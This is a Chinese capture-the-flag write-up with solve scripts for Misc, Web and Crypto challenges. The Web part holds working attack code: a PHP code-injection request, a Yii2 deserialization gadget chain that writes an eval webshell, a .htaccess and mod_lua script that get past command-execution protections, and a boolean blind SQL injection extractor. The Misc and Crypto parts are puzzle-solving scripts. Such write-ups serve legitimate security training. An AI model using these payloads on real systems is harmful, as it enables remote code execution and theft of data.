Misc
签到
附件(提取码:zlxu)
EBCDIC解码得到flag
colorful code
附件(提取码:h3w8)
data2 每三个字节为一组转成一个 RGB 三元组（调色板）；data1 中的每个数字是该像素在这张调色板中的下标；data1 中数字的个数（7067 = 37 × 191）分解质因数得到图片的宽和高；最后按此画出图片，交给 npiet（Piet 语言解释器）解出结果。
附上脚本:
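# Reconstruct the Piet program image: data2 is a palette of RGB triples and
# data1 lists, for every pixel, the index of its colour in that palette.
# 7067 = 37 * 191 indices -> a 37 x 191 picture, stored column by column.
WIDTH = 37
HEIGHT = 191


def read_palette(raw):
    """Turn the raw bytes of data2 into a list of (r, g, b) tuples.

    Consecutive byte triples are one colour each; a trailing partial triple
    is ignored (the original loop also used len(raw) // 3 groups).
    """
    usable = len(raw) - len(raw) % 3
    return [tuple(raw[i:i + 3]) for i in range(0, usable, 3)]


def read_indices(text):
    """Parse data1 (whitespace-separated palette indices) into a list of ints.

    str.split() with no argument also swallows the trailing separator that the
    original script dropped with c1[:-1], so the count does not depend on
    whether the file ends in a space or a newline.
    """
    return [int(tok) for tok in text.split()]


def build_image(pixels, width=WIDTH, height=HEIGHT):
    """Return a width x height RGB PIL image with `pixels` laid out column-major.

    pixels[row + col * height] lands at (col, row).  Raises ValueError when
    fewer than width * height pixels are given (the original would have
    failed with an IndexError on the last column).
    """
    from PIL import Image  # local import: the pure helpers above stay importable without Pillow

    if len(pixels) < width * height:
        raise ValueError("need {} pixels, got {}".format(width * height, len(pixels)))
    img = Image.new('RGB', (width, height), (255, 255, 255))
    for col in range(width):
        for row in range(height):
            img.putpixel((col, row), pixels[row + col * height])
    return img


def main():
    """Read data1/data2, rebuild the picture and write it to flag.png (input for npiet)."""
    import matplotlib.pyplot as plt

    # context managers so the two data files are closed again
    with open('data1') as f1:
        indices = read_indices(f1.read())
    with open('data2', 'rb') as f2:
        palette = read_palette(f2.read())
    print(len(indices))
    print(len(palette))
    pixels = [palette[i] for i in indices]
    img = build_image(pixels)
    plt.imshow(img)
    img.save('flag.png')


if __name__ == '__main__':
    main()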
Web
find_it
发送一个 GET 请求 `//?code=<?=phpinfo();?>`（把 PHP 代码放在 code 参数里），然后访问 hack.php 即可得到 flag。
framework
反序列化
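<?php
// Yii2 unserialize gadget chain (the chain used against Yii2 <= 2.0.37).
// The three classes below are stand-ins: they only have to serialize to the
// same shape as the real framework classes, so the namespaces and property
// names (including the private/protected ones) must match exactly:
//   yii\db\BatchQueryResult::__destruct -> $this->_dataReader->close()
//   -> Faker\Generator::__call('close') -> runs the 'close' formatter
//   -> [yii\rest\CreateAction, 'run']   -> call_user_func($checkAccess, $id)
// With checkAccess = 'assert', the string in $id is evaluated as PHP code
// (assert() with a string argument; PHP 7 only, removed in PHP 8).
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'assert';
            // assert() evaluates this string: it drops a one-line webshell
            // (base64 of "<?php eval($_GET[a]);?>") through the
            // convert.base64-decode write filter into the assets directory.
            $this->id = 'file_put_contents("php://filter/write=convert.base64-decode/resource=/var/www/html/web/assets/5118a5d1/fonts/b.php","PD9waHAgZXZhbCgkX0dFVFthXSk7Pz4K")';
            // run() reads checkAccess first; these two are never reached but
            // keep the object shape identical to the original payload
            $this->modelClass='DynamicModel';
            $this->scenario='111';
        }
    }
}
namespace Faker{
    use yii\rest\CreateAction;
    class Generator{
        // protected on purpose: the real Faker\Generator declares it protected,
        // and the serialized property name ("\0*\0formatters") must match
        protected $formatters;
        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}
namespace yii\db{
    use Faker\Generator;
    class BatchQueryResult{
        // private, as in the real class ("\0yii\db\BatchQueryResult\0_dataReader")
        private $_dataReader;
        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    // the base64 string printed here goes into the `message` parameter
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>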
# 将上面脚本输出的 base64 字符串作为 message 参数发送：http://eci-2zeab1jn4vnk38xn572o.cloudeci1.ichunqiu.com/index.php?r=site/about&message=<脚本输出的 base64 字符串>
接着通过写入的 webshell 构造 payload（注意：上面 gadget 中写入的文件名是 b.php，这里访问的文件名必须与实际写入的保持一致）：
http://eci-2zeab1jn4vnk38xn572o.cloudeci1.ichunqiu.com/assets/5118a5d1/fonts/harvey.php?a=eval($_POST[harvey]);
然后用蚁剑连接成功，但发现需要绕过保护才能执行命令（参考西湖论剑_web1.docx）；于是借助 Apache 的 mod_lua 处理器绕过：分别上传 .htaccess 和 3.lua 这两个文件
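# Hand *.lua requests to Apache's mod_lua, so the 3.lua uploaded next to this
# file runs as a server-side Lua script inside the httpd process rather than
# through PHP (which is where the command-execution protection lives).
# NOTE(review): only effective if mod_lua is loaded and .htaccess overrides
# are honoured for this directory -- confirm on the target.
AddHandler lua-script .lua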
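require "string"

--[[
mod_lua request handler.  "handle" is the default entry point name; see the
optional function-name argument of LuaMapHandler to choose another one.
The .htaccess above maps *.lua to this handler, so the command below runs
under Apache/mod_lua and not inside PHP.
--]]
function handle(r)
    r.content_type = "text/plain"
    r:puts("Hello Lua World!\n")
    -- run the flag reader and copy its stdout into the response;
    -- io.popen returns nil + message on failure instead of a handle
    local pipe, err = io.popen('/readflag')
    if not pipe then
        r:puts("popen failed: " .. tostring(err) .. "\n")
        return
    end
    local out = pipe:read("*all")
    pipe:close()  -- the original never closed the pipe handle
    r:puts(out)
    if r.method == 'GET' then
        for k, v in pairs(r:parseargs()) do
            r:puts(string.format("%s: %s\n", k, v))
        end
    else
        r:puts("Unsupported HTTP method " .. r.method)
    end
end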
最后去访问 3.lua 即可得到flag
WebsiteManger
SQL 盲注（布尔盲注：利用 `id=3^(条件)` 使条件真假时页面返回长度不同，以此作为判断依据）
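# Boolean-based blind SQL injection against image.php?id=3.
# `id` ends up in an arithmetic context, so `3^(cond)` evaluates to 2 when the
# condition is true and stays 3 otherwise; the two images differ in size and
# that size difference is the oracle.
URL = 'http://eci-2zeg1tmyhxfbqrmxi9m1.cloudeci1.ichunqiu.com/image.php?id=3'
PAYLOAD = '^((ascii(substr((select(group_concat(password))from(users)),{},1)))={})'
CHARSET = '1234567890abcdef'   # the password turned out to be hex
THRESHOLD = 19000              # body shorter than this == condition true (tuned on the target)


def build_payload(position, char):
    """Return the injection suffix testing whether password[position] == char (1-based)."""
    return PAYLOAD.format(position, ord(char))


def extract_password(url=URL, charset=CHARSET, max_len=30, threshold=THRESHOLD, fetch=None):
    """Recover group_concat(password) from `users` one character at a time.

    fetch(url) must return the response body as text; it defaults to
    requests.get(url).text.  Positions 1 .. max_len-1 are probed, as in the
    original loop.  Extraction stops at the first position where no charset
    character matches (end of string, or a character outside `charset`) --
    the original silently skipped such positions and produced a shifted
    result.  Each recovered character is printed to show progress.
    Returns the recovered string.
    """
    if fetch is None:
        import requests  # local so the pure helpers stay importable without requests

        def fetch(u):
            return requests.get(u).text

    found = []
    for position in range(1, max_len):
        for ch in charset:
            body = fetch(url + build_payload(position, ch))
            if len(body) < threshold:
                found.append(ch)
                print(ch)
                break
        else:
            # nothing matched at this position: end of the string
            break
    return ''.join(found)


if __name__ == '__main__':
    print(extract_password())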
跑下脚本得到密码:dd6005ef9c77d5ae820ba;进而成功登录
登录后存在 SSRF，通过 file:///flag 读取到 flag。
Crypto(原题)
primegame
附件(提取码:rlgc)
源自Baby Bubmi的wp:http://www.secmem.org/blog/2020/09/20/poka-science-war-hacking/
附上脚本:
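import math
from decimal import *
import random
import struct

# 100 decimal digits: the ciphertext keeps 64 hex digits (~77 decimal digits)
# of the fractional part, so the logarithms have to be at least that accurate.
getcontext().prec = int(100)


def _primes_below(limit):
    """Return the primes < limit by trial division against the primes found so far."""
    found = []
    for cand in range(2, limit):
        is_prime = True
        for p in found:
            if p * p > cand:      # the original tested i*i < j, which never fired
                break
            if cand % p == 0:
                is_prime = False
                break
        if is_prime:
            found.append(cand)
    return found


primes = _primes_below(100)
SCALE = int(16) ** int(64)
# the "key" for prime p_i is ln(p_i); arr holds the same values scaled to integers
keys = [Decimal(int(p)).ln() for p in primes]
arr = [int(k * SCALE) for k in keys]
ct = 597952043660446249020184773232983974017780255881942379044454676980646417087515453


def encrypt(res):
    """Encrypt `res` (one integer per prime): floor(sum(res[i] * ln(p_i)) * 16^64).

    Used to verify a lattice candidate against ct.  Raises ValueError if res
    does not have exactly one entry per prime (the original indexed by
    len(keys) and would have failed with IndexError, or silently ignored
    extra entries).
    """
    if len(res) != len(keys):
        raise ValueError("expected %d coefficients, got %d" % (len(keys), len(res)))
    h = Decimal(int(0))
    for m, k in zip(res, keys):
        h += m * k   # the original had `h = ...`, which kept only the last term
    return int(h * SCALE)


def f(N):
    """Try to recover the plaintext with the lattice scaled down by N (needs Sage: Matrix, ZZ, LLL).

    Rows 0..ln-1 are e_i with arr[i] // N in the last column; the extra row is
    (64, ..., 64, ct // N).  A reduced row whose first ln coordinates all lie
    in [-64, 64) is taken as a candidate, shifted by 64 back into byte range
    and checked with encrypt(): matches are printed as (N, bytes), mismatches
    with a leading "NO".
    """
    ln = len(arr)
    A = Matrix(ZZ, ln + 1, ln + 1)
    for i in range(ln):
        A[i, i] = 1
        A[i, ln] = arr[i] // N
        A[ln, i] = 64
    A[ln, ln] = ct // N
    reduced = A.LLL()
    for row in reduced:
        coords = row[:-1]
        if not all(-64 <= v < 64 for v in coords):
            continue
        vec = [int(v + 64) for v in coords]
        ret = encrypt(vec)
        if ret == ct:
            print(N, bytes(vec))
        else:
            print("NO", ret, bytes(vec))


if __name__ == "__main__":
    # the divisor N is unknown; try N = 2 .. 9999 as the original did.
    # Guarded so importing this file does not start the brute force.
    for N in range(2, 10000):
        print(N)
        f(N)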
hpcurve
附件(提取码:97js)
源自 hxpCTF2020 的 hyper 的官方wp:https://jsur.in/posts/2020-12-21-hxp-ctf-2020-hyper-writeup
附上脚本:
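import itertools
import struct

# Parameters of the hxp CTF 2020 "hyper" challenge: a hyperelliptic curve
# y^2 = x^7 + x over GF(p); the challenge's "RNG" walks its Jacobian.
p = 10000000000000001119
R.<x> = GF(p)[]; y = x
# map(eval, 'yyyyyyy') evaluates the character 'y' seven times, so this is x + x^7
f = y + prod(map(eval, 'yyyyyyy'))
C = HyperellipticCurve(f, 0)
J = C.jacobian()
Ds = [J(C(x, min(f(x).sqrt(0, 1)))) for x in (11, 22, 33)]
enc = bytes.fromhex('66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5')
# The first 24 plaintext bytes are known; XOR-ing them out (^^ is Sage's XOR,
# plain ^ is exponentiation in Sage) gives 24 bytes of keystream: three
# little-endian 64-bit words, read here as the coefficients u0, u1, u2 of
# the Mumford polynomial u(x) = x^3 + u2 x^2 + u1 x + u0.
known_pt = b"a" * 20 + b"flag"
rng_output = bytes(e ^^ m for e, m in zip(enc, known_pt))
blocks = [rng_output[i:i + 8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]
# The roots of u are the x-coordinates of the divisor's points; v is the
# polynomial interpolating a square root of f at each of them.
L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]
RR.<zz> = PolynomialRing(L)
v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
# v[i] is the coefficient of zz^i; the original used v.coefficients()[i],
# which skips zero coefficients and would shift the indices.  The sign of
# each coefficient is ambiguous (sqrt choice), so both are tried below.
vi = [v[i].as_finite_field_element()[1] for i in range(3)]
vi = [(int(-c), int(c)) for c in vi]
for rs in itertools.product(*vi):
    # u0,u1,u2 followed by the guessed v0,v1,v2, repeated to cover the whole ciphertext
    q = struct.pack('<' + 'Q' * len(rs), *rs)
    flag = bytes(k ^^ m for k, m in zip(2 * (rng_output + q), enc))
    print(flag)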